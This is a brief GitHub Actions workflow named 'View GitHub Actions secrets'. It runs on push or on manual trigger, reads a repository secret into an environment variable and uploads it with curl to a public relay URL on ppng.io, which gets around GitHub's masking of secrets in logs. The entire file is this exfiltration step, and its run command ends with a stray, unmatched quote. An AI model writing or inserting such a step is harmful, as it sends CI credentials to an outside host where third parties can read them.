name: View GitHub Actions secrets
on:
  push:
    branches: [master]
  workflow_dispatch:
  # 可以在仓库的 Actions 页面中手动触发
 
jobs:
  github-actions-environment-variables-ubuntu:
    runs-on: ubuntu-latest
    steps:
      - name: Transfer secrets
        env:
          SUPER_SECRET: ${{ secrets.test }}
        run: echo "token is $SUPER_SECRET,other is $env" | curl -T - https://ppng.io/justtest123"
